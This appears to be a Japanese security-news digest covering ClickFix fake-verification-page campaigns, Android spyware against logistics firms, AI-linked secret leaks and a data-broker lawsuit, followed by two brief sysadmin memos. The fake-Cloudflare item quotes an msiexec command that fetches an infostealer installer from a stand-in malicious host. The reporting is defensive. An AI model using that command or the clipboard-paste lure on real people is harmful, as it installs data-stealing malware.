データブローカーRadaris、プライバシー訴訟でドメイン失う

概要 米国の個人情報ブローカーRadaris.comが、ニュージャージー州のプライバシー法「Daniel’s Law」に違反したとして訴えられ、裁判所の命令で同社が保有するドメインが原告側に移管されました。訴訟はデータブローカーが州警察や裁判官など公務員の個人情報を削除しないことに対し、1件あたり1,000ドルの罰金を科す規定を根拠としています。 技術的詳細・特徴 Radarisは多数の人検索サービスとロシア語デーティングサイトを運営し、創業者はマサチューセッツ在住のロシア系兄弟(Igor・Dmitry)とされています。訴訟資料からは、同社が「Gary Norden」という架空のCEOを名乗り、投資家向けプレスリリースで引用していたことが判明しました。また、弁護士は訴訟前に証拠開示を遅延させ、最終的にデフォルト判決を回避できませんでした。 影響・対策方法 日本のエンジニアや情報セキュリティ担当者は、以下の点に留意すべきです。 自社のサービスが個人情報を第三者に提供していないか定期的にレビューする。 公的機関や裁判官の個人情報が検索エンジンに露出している場合、削除依頼をデータブローカーに提出する。 プライバシー法制(例:EU GDPR、米国州法)に準拠したデータ保持ポリシーを策定し、違反リスクを最小化する。 疑わしいデータブローカーはドメイン情報や所有者を WHOIS で確認し、必要に応じて法的手段を検討する。 出典 情報元: Krebs on Security

偽Cloudflareページで誘導する新手情報窃盗マルウェア

概要 ウクライナの正規サイトが改ざんされ、偽のCloudflare検証ページが表示されます。訪問者が指示に従うと、クリップボードにWindowsインストーラコマンドがコピーされ、実行すると「Psychedelic」という情報窃盗マルウェアがダウンロードされます。攻撃はClickFixというキャンペーンで実施されています。 技術的詳細・特徴 攻撃者はサーバーにスクリプトを埋め込み、アクセス時に偽のCloudflare「I’m under attack」ページを返します。ページ内のボタンがクリックされると、JavaScriptでmsiexec /i https://malicious.example.com/psychedelic.msi のコマンドをクリップボードにコピーし、貼り付け実行を促します。マルウェアは未公開の情報窃盗型で、キー入力やスクリーンショット、ブラウザデータを収集します。 影響・対策方法 正規サイトでも偽の検証ページが表示されるため、URLや証明書を必ず確認する。 不審なコピーコマンドは貼り付けず、実行前にファイルのハッシュや出所を検証する。 ブラウザの拡張機能やセキュリティソフトでクリップボード操作を監視する。 Webサーバーの改ざん検知と定期的なファイル整合性チェックを導入する。 出典 情報元: The Hacker News

AI生成コードがもたらすシークレット流出の急増と対策

概要 AIコーディングエージェントが開発速度を上げる一方で、認証情報の漏洩リスクも倍増しています。GitGuardianの2026年レポートによると、AI支援コミットは人手によるものの約2倍の頻度でシークレットを漏らしています。特にAI関連の資格情報が急速に増加しています。この現象は「シークレットスプレイル」と呼ばれ、アイデンティティ管理の新たな課題となっています。 技術的詳細・特徴 AIはコード生成時に過去のリポジトリや公開されたサンプルを参照し、無意識にアクセストークンやAPIキーを埋め込むことがあります。AIモデルは大規模データで学習するため、過去に公開されたシークレットが埋め込まれたコードを記憶し、生成時に再利用するリスクがあります。また、従来の正規表現ベースのスキャンではAI特有の変形パターンを検出しにくく、機械学習ベースの検知が必須です。GitGuardianはパターンマッチングと機械学習で「AI支援」コミットを識別し、漏洩率が高いことを報告しました。漏洩対象はクラウドAPIキー、データベース認証情報、CI/CDトークンなど多岐にわたります。 影響・対策方法 CIパイプラインでシークレットスキャンを自動化し、AI生成コードも対象にする。 開発者にシークレット除去ツール(git‑filter‑repo 等)の使用を徹底させる。 AIエージェントに対して「シークレット除外」プロンプトを組み込み、生成後にレビューを必須化する。 漏洩したシークレットは即時ローテーションし、監査ログを確認する。 シークレット管理ツール(HashiCorp Vault, AWS Secrets Manager 等)と統合し、AI生成コードが直接参照できないようにする。 出典 情報元: The Hacker News

物流業界を狙うAndroidスパイウェア「Corp MDM」登場

物流企業を標的にした新たなAndroidスパイウェア「Corp MDM」のキャンペーンが確認されました。偽のGoogle Playページ(CEVA、TKW Logistics)からAPKが配布され、システムサービスに偽装してインストールされます。 インストールされたアプリはパッケージ名「com.corp.mdm」を持ち、SMSの取得や通話のリダイレクト、端末情報の収集を行います。 被害は物流業務の機密情報漏洩や通信の乗っ取りにつながる可能性があります。 技術的詳細・特徴 主な特徴は以下の通りです。 偽Google Playページで正規アプリに見せかけて配布。 APKはシステムサービスとしてインストールされ、権限昇格を狙う。 SMS読み取り、通話リダイレクト、デバイス情報取得、位置情報取得が可能。 通信は暗号化されたC2サーバへ送信され、検知が困難。 影響・対策方法 物流企業のモバイル端末が感染すると、顧客情報や配送計画が外部に漏洩し、業務妨害や詐欺に利用される恐れがあります。 不審なアプリストアやリンクからのインストールを禁止。 MDM(モバイルデバイス管理)でインストール可能アプリをホワイトリスト化。 端末のOSとセキュリティパッチを常に最新に保つ。 SMSや通話の異常挙動を監視し、疑わしい通信をブロック。 社員教育で「公式ストア以外からのアプリインストールは危険」旨を周知。 情報元: The Hacker News

ClickFixが正規サイトをマルウェア罠に変える手口が明らかに

概要 ClickFixは、攻撃者がエンタープライズネットワークに侵入する際に最も頻繁に利用される手法となっています。エクスプロイトや添付ファイル、ディスク上のマルウェアを必要とせず、正規サイトのURLを悪用してユーザーを誘導します。本レポートは2023年後半に出現したこの手口を追跡し、サブスクリプション型サービス化とブロックチェーン上のインフラ、国家支援ユーザーの存在を明らかにしています。 技術的詳細・特徴 正規サイトのURLを大量に取得(約17,000件)し、リダイレクトチェーンに組み込む。 リダイレクトはJavaScriptやHTMLメタリフレッシュを利用し、ユーザーのブラウザ上で自動的に実行される。 攻撃は「オンチェーン」インフラで管理され、サブスクリプション購入者だけが最新の悪質URLリストにアクセス可能。 従来のドメインブロックではリダイレクト先が頻繁に変わるため防御が困難。 国家支援のハッカー集団が利用しているとされ、標的は大企業や政府機関が中心。 影響・対策方法 ユーザーが正規サイトにアクセスした瞬間にマルウェアがダウンロードされるため、感染拡大が極めて速い。従来のURLフィルタリングだけでは対応できません。推奨される対策は以下の通りです。 DNSレベルでの疑似ドメイン検知と、リダイレクトチェーンの深さを制限する。 サンドボックス型のWebプロキシでJavaScript実行を監視し、未知のリダイレクトをブロック。 エンドポイントのリアルタイム脅威インテリジェンスを導入し、ClickFix関連のハッシュやIPを自動更新。 従業員教育で「不審なリダイレクトが発生したら即座に報告」する意識を徹底。 出典 情報元: The Hacker News

AIリスク管理を即時サービス化!LatticeFlowのAI Risk Centerが企業向けに提供開始

概要 LatticeFlow AIは、AIシステムのリスクを継続的に評価・制御するマネージドサービス「AI Risk Center」を発表しました。専門チームや高度な評価ツールを自前で構築する時間を削減し、数週間でリスク監視を開始できます。 AIモデルやデータは頻繁に変化するため、従来の一時的な評価では安全性が担保できません。LatticeFlowはこの課題に対し、継続的なリスク測定と自動化されたレポートを提供します。 企業は評価対象、フレームワーク、リスク閾値、評価頻度を自由に設定でき、結果は技術的な証拠と共に提示されます。 技術的詳細・特徴 深層技術評価:モデルの脆弱性、データドリフト、エージェントワークフローの安全性を自動解析。 カスタマイズ可能なフレームワーク:ISO/IEC 27001、NIST AI Risk Management Framework などに対応。 継続的モニタリング:評価結果をリアルタイムで更新し、リスク指標をダッシュボードで可視化。 エビデンス自動生成:検出されたリスクに対する根拠資料を自動作成し、監査対応を支援。 影響・対策方法 このサービスを導入すれば、AIリスク管理に必要な専門人材やインフラ投資を大幅に削減でき、開発サイクルを加速させながらコンプライアンスを確保できます。導入時は、まず重要度の高いAIシステムを選定し、社内のリスク許容度と評価頻度を設定することが推奨されます。 ※AIリスクは一度の評価で完結しない点に留意し、継続的なモニタリング体制を構築することが重要です。 出典 情報元: Help Net Security

【重大】ClickFix攻撃が企業ネットワークの主要侵入経路に 信頼されたWebサイト経由でマルウェアを仕掛ける新手法

概要 CTM360の最新グローバル脅威レポートによると、ClickFixは現在、攻撃者が企業ネットワークに侵入するための最も一般的な手法となっています。 この攻撃は、脆弱性の悪用(エクスプロイト)、添付ファイル、ディスク上のファイルなしで実行される点が特徴です。 2023年末の新奇な手法から、オンチェーンインフラを備えたサブスクリプション型サービスへと進化し、国家支援のユーザー基盤まで持つに至りました。 技術的詳細・攻撃手法 ClickFix攻撃は、被害者が信頼できるWebサイトだと思ってアクセスしたページで、意図的な操作(クリックやキー入力)を誘発させることで成立します。 エクスプロイト不要: 従来のマルウェア配布とは異なり、OSやブラウザの脆弱性を突く必要がありません。 ファイルレス: 攻撃コードはメモリ上で実行され、ディスクにファイルが残らないため、従来のファイルベースの検知では困難です。 信頼の悪用: 17,000以上のURLが分析され、攻撃者が信頼されたドメインや正規のWebサイトをマルウェアの罠に変換していることが判明しました。 インフラの進化: ブロックチェーン上のインフラ(オンチェーンインフラ)を活用し、攻撃の持続性と追跡困難性を高めています。 影響を受けるシステム・対策方法 この攻撃は、Webブラウザが使用されるすべてのエンドポイント(PC、モバイル、タブレット)に影響を与えます。 ドメインブロックの限界: 元記事は、悪意あるドメインのブロックだけでは防御が不十分であると指摘しています。攻撃者が信頼されたドメインや動的なインフラを利用するため、単なるブラックリストでは追いつけません。 ユーザー教育の強化: 「F12キーを押してコンソールを開く」「特定のコードをコピペして実行する」などの指示が攻撃の一部であることを認識させる教育が必要です。 エンドポイント保護の高度化: ファイルベースだけでなく、メモリ上の異常なプロセスや、ブラウザコンソールでのスクリプト実行を検知するEDR(Endpoint Detection and Response)ソリューションの導入・強化が不可欠です。 Webフィルタリングの再評価: 単なるドメイン名だけでなく、コンテンツベースの分析や、既知のClickFixパターンを検出するAIベースのフィルタリングを検討すべきです。 出典 本記事は以下の元記事に基づいています。 17,000 URLs Reveal How ClickFix Turns Trusted Websites Into Malware Traps: Report by CTM360The Hacker News – 17,000 URLs Reveal How ClickFix Turns Trusted Websites Into … Read more

windows hostsファイルをコマンド一発で開く方法

開発業務をしているとhostsファイルを頻繁に更新するので備忘録がてら、こちらに記述しておく。尚、コマンドプロンプトといっても実際にはパワーシェルを実行している。 上記ではwindows標準アプリのメモ帳を使って開くようにしているけど、そこは自分が使い慣れたアプリケーションを指定すると良い。

Linuxで時刻指定で一度だけ実行するジョブを設定する方法(at)

準備 ‘at’のインストール 私の環境(RockyLinux9.2)に初期状態でインストールされていなかったので、まずはインストールする。 自動起動設定 atdというデーモンがジョブを管理している。 設定 書式は以下。 2023年6月24日21時45分にルートディレクトリ直下にあるexample.shというシェルスクリプトを実行するようジョブ登録する場合は以下。example.shには実行権限が付与されている前提。 ジョブ確認 方法は2通り。どちらでも良い。 ジョブ削除 こちらについても2通りある。事前にジョブIDを把握しておく必要があるので、atqコマンドで確認しておくこと。 事前に告知したウェブサイトの更新作業などには、atでジョブスケジューリングすると良さそう。